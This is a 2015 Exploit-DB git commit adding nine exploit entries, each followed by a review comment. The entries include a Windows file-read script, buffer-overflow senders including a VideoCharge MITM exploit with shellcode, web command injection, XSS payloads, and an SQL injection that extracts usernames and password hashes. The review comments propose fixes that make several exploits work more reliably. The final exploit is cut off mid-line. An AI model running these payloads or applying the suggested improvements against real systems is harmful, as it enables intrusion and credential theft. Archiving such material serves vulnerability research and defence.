From 415f43407d855fe60a4ec70d4c357c8e33fb7eb3 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 27 Dec 2015 05:02:11 +0000
Subject: [PATCH] DB: 2015-12-27 9 new exploits
---
files.csv | 9 ++
platforms/asp/webapps/39106.txt | 7 ++
platforms/multiple/remote/39104.py | 25 ++++++
platforms/php/webapps/39093.txt | 27 ++++++
platforms/php/webapps/39107.txt | 83 ++++++++++++++++++
platforms/php/webapps/39108.txt | 10 +++
platforms/php/webapps/39109.txt | 9 ++
platforms/php/webapps/39110.txt | 9 ++
platforms/windows/local/39102..py | 55 ++++++++++++
platforms/windows/remote/39105.py | 134 +++++++++++++++++++++++++++++
10 files changed, 368 insertions(+)
create mode 100755 platforms/asp/webapps/39106.txt
create mode 100755 platforms/multiple/remote/39104.py
create mode 100755 platforms/php/webapps/39093.txt
create mode 100755 platforms/php/webapps/39107.txt
create mode 100755 platforms/php/webapps/39108.txt
create mode 100755 platforms/php/webapps/39109.txt
create mode 100755 platforms/php/webapps/39110.txt
create mode 100755 platforms/windows/local/39102..py
create mode 100755 platforms/windows/remote/39105.py
diff --git a/files.csv b/files.csv
index cb6386852..844cd3de2 100755
--- a/files.csv
+++ b/files.csv
@@ -35334,6 +35334,8 @@ id,file,description,date,author,platform,type,port
 39072,platforms/win64/dos/39072.txt,"Adobe Flash Sound.setTransform - Use-After-Free",2015-12-21,"Google Security Research",win64,dos,0
 39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/reboot.cgi Unauthenticated Remote Reboot DoS",2014-02-03,"Josue Rojas",cgi,dos,0
 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
+39105,platforms/windows/remote/39105.py,"VideoCharge Studio 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow Vulnerability",2014-02-19,"Julien Ahrens",windows,remote,0
+39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia Stack Buffer Overflow Vulnerability",2014-02-19,"Mohamed Shetta",multiple,remote,0
 39076,platforms/multiple/dos/39076.txt,"Wireshark infer_pkt_encap - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
 39077,platforms/multiple/dos/39077.txt,"Wireshark AirPDcapDecryptWPABroadcastKey - Heap-Based Out-of-Bounds Read",2015-12-22,"Google Security Research",multiple,dos,0
 39078,platforms/php/webapps/39078.txt,"Web Video Streamer Multiple Security Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0
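Review bot: The two new rows `39105` and `39104` are inserted between `39074` and `39076`, and in descending order, so this part of the index is no longer sorted by id; every other row added in this commit goes after `39101` in the next hunk. Moving these two rows there, as `39104` then `39105`, keeps the file in id order and makes later merges in this region cleaner.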
@@ -35351,6 +35353,13 @@ id,file,description,date,author,platform,type,port
 39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload Vulnerability",2014-02-05,"TUNISIAN CYBER",php,webapps,0
 39091,platforms/php/webapps/39091.pl,"WHMCS 'cart.php' Denial of Service Vulnerability",2014-02-07,Amir,php,webapps,0
 39092,platforms/php/webapps/39092.pl,"phpBB <= 3.0.8 Remote Denial of Service Vulnerability",2014-02-11,Amir,php,webapps,0
+39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
 39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
+39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0
+39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0
+39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0
+39108,platforms/php/webapps/39108.txt,"POSH 3.1.x 'addtoapplication.php' SQL Injection Vulnerability",2014-02-26,"Anthony BAUBE",php,webapps,0
+39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection Vulnerability",2014-03-04,anonymous,php,webapps,0
+39110,platforms/php/webapps/39110.txt,"Cory Jobs Search 'cid' Parameter SQL Injection Vulnerability",2014-03-05,Slotleet,php,webapps,0
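Review bot: The new `39102` row classifies the EasyCafe script as `windows,local` with port `0`, but the script it indexes connects to a remote `IP` on `PORT = 831` and its own title says "Remote File Read", so the row should read `…,windows,remote,831` and the file should live under `platforms/windows/remote/`. The path `platforms/windows/local/39102..py` also carries a doubled dot that looks like a typo; the file is created under that exact name in this commit, so the rename has to change the file and this row together. The `39108` row titles the entry "POSH 3.1.x" while the advisory text in that file says "Versions prior to POSH 3.3.0 are vulnerable"; the two should agree.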
diff --git a/platforms/asp/webapps/39106.txt b/platforms/asp/webapps/39106.txt
new file mode 100755
index 000000000..4fd1a14d8
--- /dev/null
+++ b/platforms/asp/webapps/39106.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/65740/info
+
+eshtery CMS is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
+
+Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
+
+ http://www.example.com/[path]/FileManager.aspx?file=E:\web\admin.asp
\ No newline at end of file
diff --git a/platforms/multiple/remote/39104.py b/platforms/multiple/remote/39104.py
new file mode 100755
index 000000000..aa1988b44
--- /dev/null
+++ b/platforms/multiple/remote/39104.py
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/65675/info
+
+Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+Catia V5-6R2013 is vulnerable.
+
+#!/usr/bin/env python
+
+import socket
+import struct
+import ctypes
+
+RetAdd="\x90\x90\x90\x90"
+Shell="S" *1000
+buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.0.3", 55555))
+#s.connect(("192.168.0.5", 55558))
+s.send(struct.pack('>I',len(buff) ))
+s.send(buff)
+buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell
+s.send(struct.pack('>I',len(buff) ))
+s.send(buff)
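Review bot: The only PoC line reads `E:\web\admin.asp`, an absolute path specific to the researcher's host, so the entry says nothing about how the `file` parameter is consumed — whether it must be absolute, whether `..\` traversal from the web root works, or whether any extension check is applied. A request for a file present on every Windows host, e.g. `FileManager.aspx?file=C:\Windows\win.ini`, would be reproducible, and one sentence on whether `FileManager.aspx` is reachable without an admin session would let readers judge severity. Neither point is visible in the advisory text as committed.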
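Review bot: `RetAdd` is four NOP bytes and `Shell` is 1000 `S` bytes, so the second packet overwrites the saved return address with `0x90909090` and lands on filler — as committed this script can only crash the CATIA backbone listener, while the header text and the csv type promise code execution; the header should say it is a crash PoC unless a real return address and payload are supplied. `s.send` may deliver only part of a buffer and the length prefix is sent in a separate call; `s.sendall(struct.pack('>I', len(buff)) + buff)` sends both together, and the socket is never closed. `import ctypes` is unused, the target `192.168.0.3:55555` is hard-coded rather than taken from argv, and the `"\x00\x00\x98"` field is three bytes where every neighbouring field is four, which looks like a dropped byte that should be checked against the original advisory.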
diff --git a/platforms/php/webapps/39093.txt b/platforms/php/webapps/39093.txt
new file mode 100755
index 000000000..7ef2ddbe4
--- /dev/null
+++ b/platforms/php/webapps/39093.txt
@@ -0,0 +1,27 @@
+================================================================================
+# Beezfud Remote Code Execution
+================================================================================
+# Vendor Homepage: https://github.com/EVA-01/beezfud
+# Date: 23/12/2015
+# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
+# Author: Ashiyane Digital Security Team
+# Contact: hehsan979@gmail.com
+# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
+================================================================================
+# Vulnerable File : index.php
+
+# PoC :
+
+http://localhost/beezfud/index.php?parameter=;Command;
+
+Vulnerable Parameters : lookback , max , range , latest , earliest
+
+
+Example :
+
+http://localhost/beezfud/index.php?lookback=;echo '' >info.php;
+
+================================================================================
+# Discovered By : Ehsan Hosseini (EhsanSec.ir)
+================================================================================
diff --git a/platforms/php/webapps/39107.txt b/platforms/php/webapps/39107.txt
new file mode 100755
index 000000000..322e21efc
--- /dev/null
+++ b/platforms/php/webapps/39107.txt
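Review bot: The example on the `lookback=` line writes an empty string into `info.php` — the payload between the quotes has evidently been lost (presumably a `<?php … ?>` tag stripped as markup), so the PoC as committed does nothing useful; restore the intended payload or describe it in words. The advisory never names the sink: the `;Command;` pattern implies the five parameters reach a shell, but which call in `index.php` does so, and whether the values are used unquoted, is not stated. The Software Link points at `master.zip`, a moving target; pinning the tested commit hash would make the claim reproducible.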
@@ -0,0 +1,83 @@
+source: http://www.securityfocus.com/bid/65744/info
+
+ATutor is prone to multiple cross-site scripting vulnerabilities and a HTML-injection vulnerability.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+ATutor 2.1.1 is vulnerable; other versions may also be affected.
+
+1. During installation: xss and sql insertion:
+
+------
+POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
+Host: www.example.com
+(...)
+Content-Length: 191
+
+action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
+------
+
+
+------
+
  • Database \'>\"> created successfully. +------ + +--> tb_prefix and new_version parameter are also vulnerable. + + +# ============================================================== +# 2. XSS + +------ +POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1 +Host: www.example.com +(...) +Content-Length: 667 + +action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB + +------ + +Vulnerable to XSS are also parameters: +step2%5Bnew_version%5D +step2%5Bdb_host%5D +step2%5Bdb_port%5D +step2%5Bdb_login%5D +step2%5Bdb_password%5D +step2%5Bdb_name%5D +step2%5Btb_prefix%5D + + +# ============================================================== +# 3. Persistent XSS (from admin) + +------ +POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1 +Host: www.example.com +(...) +Content-Length: 108 + +add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save +------ + +------ +*
    + " /> + +------ + + + +# ============================================================== +# 4. Edit config (from admin user): + +------ +POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1 +Host: www.example.com +(...) +Content-Length: 946 + +site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save +------ diff --git a/platforms/php/webapps/39108.txt b/platforms/php/webapps/39108.txt new file mode 100755 index 000000000..564888807 --- /dev/null +++ b/platforms/php/webapps/39108.txt 
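Review bot: Section 1 is headed "xss and sql insertion", but the only evidence shown is the `db_name` value echoed back in the "Database … created successfully" message — that is reflected XSS in the installer, and nothing in the hunk shows an SQL error or an injected query result, so the injection claim should be demonstrated or dropped. Sections 1–2 only work while `install/install.php` is still reachable, and sections 3–4 require an admin session as their own headings say; the summary at the top should state those preconditions so the severity is not overstated. The response excerpts after the first request and after the forum request have lost their markup in this copy (a bullet and a stray `" />` remain), so the context in which the payload is reflected can no longer be read.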
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/65817/info
+
+POSH is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Versions prior to POSH 3.3.0 are vulnerable.
+
+http://www.example.com/portal/addtoapplication.php?pid=0&rssurl=url,nbvariables,defvar%20FROM%20dir_item,dir_cat_item
+%20WHERE%201=0%20UNION%20SELECT%201,2,3,4,5,6,(select%20group_concat(username,':',email,':',md5pass)%20from%20users),8%23
\ No newline at end of file
diff --git a/platforms/php/webapps/39109.txt b/platforms/php/webapps/39109.txt
new file mode 100755
index 000000000..adbc17de9
--- /dev/null
+++ b/platforms/php/webapps/39109.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65960/info
+
+Relevanssi plugin for WordPress is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Versions prior to Relevanssi 3.3 are vulnerable.
+
+http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi
\ No newline at end of file
diff --git a/platforms/php/webapps/39110.txt b/platforms/php/webapps/39110.txt
new file mode 100755
index 000000000..4d9683f87
--- /dev/null
+++ b/platforms/php/webapps/39110.txt
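Review bot: The PoC URL is split across two hunk lines (`…dir_item,dir_cat_item` and `%20WHERE%201=0%20UNION…`); pasted as committed it yields two broken requests, so the two lines should be joined into one. The affected range here says "prior to POSH 3.3.0" while the csv row titles the entry "POSH 3.1.x"; the two should agree. The `rssurl` value lands after `FROM` in the query, i.e. it is spliced into the statement text rather than bound, and whether `addtoapplication.php` requires a logged-in portal user is not stated.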
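Review bot: The PoC line contradicts the advisory: the text and the csv title name the Relevanssi plugin and the `category_name` parameter, but the URL targets `wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi` — a different plugin and a different parameter, with the placeholder bracket left unclosed. Either the wrong PoC was pasted into this entry or the title is wrong; check against BID 65960, fix one of them, and close the placeholder as `listing_id=[SQLi]`. As committed the entry points readers at code the advisory does not describe.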
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65969/info
+
+Cory Jobs Search is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Cory Jobs Search 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/coryapps/jobsearch/admincp/city.php?cid=[MySQL Injection]
\ No newline at end of file
diff --git a/platforms/windows/local/39102..py b/platforms/windows/local/39102..py
new file mode 100755
index 000000000..e2abfe75c
--- /dev/null
+++ b/platforms/windows/local/39102..py
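Review bot: The vulnerable script lives under `admincp/`, which suggests an admin-only area, yet the advisory says nothing about whether `city.php` enforces a login; that single fact decides whether this is pre-auth or post-auth SQL injection and should be stated. The placeholder `[MySQL Injection]` gives no verifiable payload — a minimal pair such as `cid=1 AND 1=1` versus `cid=1 AND 1=2`, or a `cid=1'` error trigger, would make the entry testable.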
@@ -0,0 +1,55 @@
+#!/usr/bin/python -w
+# Title : EasyCafe Server <= 2.2.14 Remote File Read
+# Date : 25/12/2015
+# Author : R-73eN
+# Tested on : Windows 7 Ultimate
+# Software Link : http://www.tinasoft.com/easycafe/
+# Download Link: http://www.tinasoft.com/Download/easysetup.exe
+# Vulnerable Versions : EasyCafe Server <= 2.2.14
+# EasyCafe Server has a feature to upload file from the server to a client.
+# And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload,
+# Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it.
+# The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request,
+# and does not check if it has sent the UDP request which gives us full Read access to the system.
+#
+#EDB Note: Code my need some adjusting
+
+import socket
+#Banner
+banner = ""
+banner += " ___ __ ____ _ _ \n"
+banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
+banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
+banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
+banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
+print banner
+
+
+
+IP = "192.168.43.36" # Target IP
+PORT = 831
+file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts" # File to read
+
+
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((IP, PORT))
+file_to_read = "\x43" + file_to_read
+hex_value = ''.join(x.encode('hex') for x in file_to_read)
+fill = "\x00"
+end = "\x01\x00\x00\x00\x01"
+payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end
+s.send(payload)
+s.settimeout(0)
+print "[+] Request Send Waiting for Response . . . 
[+]"
+
+try:
+ data = s.recv(261) # Get header
+ while data:
+ data = s.recv(2048)
+ print data
+
+except Exception:
+ print "[+] https://www.infogen.al/ [+]"
+finally:
+ s.close()
\ No newline at end of file
diff --git a/platforms/windows/remote/39105.py b/platforms/windows/remote/39105.py
new file mode 100755
index 000000000..f3055bb9c
--- /dev/null
+++ b/platforms/windows/remote/39105.py
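Review bot: `s.settimeout(0)` switches the socket to non-blocking mode, so the `s.recv(261)` that follows raises immediately unless the reply is already queued; that exception is caught by the broad `except Exception`, which prints the author's URL and hides the real error, so in practice the script rarely prints the file. Use a real timeout, e.g. `s.settimeout(5)`, and report the failure instead of swallowing it, e.g. `except socket.error as e: print "[-] %s" % e`. The `encode('hex')`/`decode('hex')` round trip leaves `file_to_read` unchanged and can be dropped, `s.send(payload)` should be `s.sendall(payload)`, and the file name `39102..py` carries a doubled dot. Per its own header this is an unauthenticated read over TCP 831 from a remote host, which does not fit the `windows/local` directory it is committed under.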
@@ -0,0 +1,134 @@
+source: http://www.securityfocus.com/bid/65685/info
+
+VideoCharge Studio is prone to a remote stack-based buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
+
+Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts likely result in denial-of-service conditions.
+
+VideoCharge Studio 2.12.3.685 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+# Exploit Title: VideoCharge Studio v2.12.3.685 cc.dll GetHttpResponse()
+MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
+# Version: v2.12.3.685
+# Date: 2014-02-18
+# Author: Julien Ahrens (@MrTuxracer)
+# Homepage: http://www.rcesecurity.com
+# Software Link: http://www.videocharge.com
+# Tested on: Win7-GER (DEP enabled)
+#
+# Howto / Notes:
+# Since it's a MITM RCE you need to spoof the DNS Record for
+www.videocharge.com in order to successfully exploit this vulnerability
+#
+
+from socket import *
+from struct import pack
+from time import sleep
+
+host = "192.168.0.1"
+port = 80
+
+s = socket(AF_INET, SOCK_STREAM)
+s.bind((host, port))
+s.listen(1)
+print "\n[+] Listening on %d ..." 
% port + +cl, addr = s.accept() +print "[+] Connection accepted from %s" % addr[0] + +# Thanks Giuseppe D'Amore for the amazing shellcode +# http://www.exploit-db.com/exploits/28996/ +shellcode = +("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+ +"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+ +"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+ +"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+ +"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+ +"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+ +"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+ +"\x49\x0b\x31\xc0\x51\x50\xff\xd7") + +junk0 = "\x90" * 1277 +junk1 = "\x90" * 1900 +nops="\x90" * 30 +jmpesp=pack('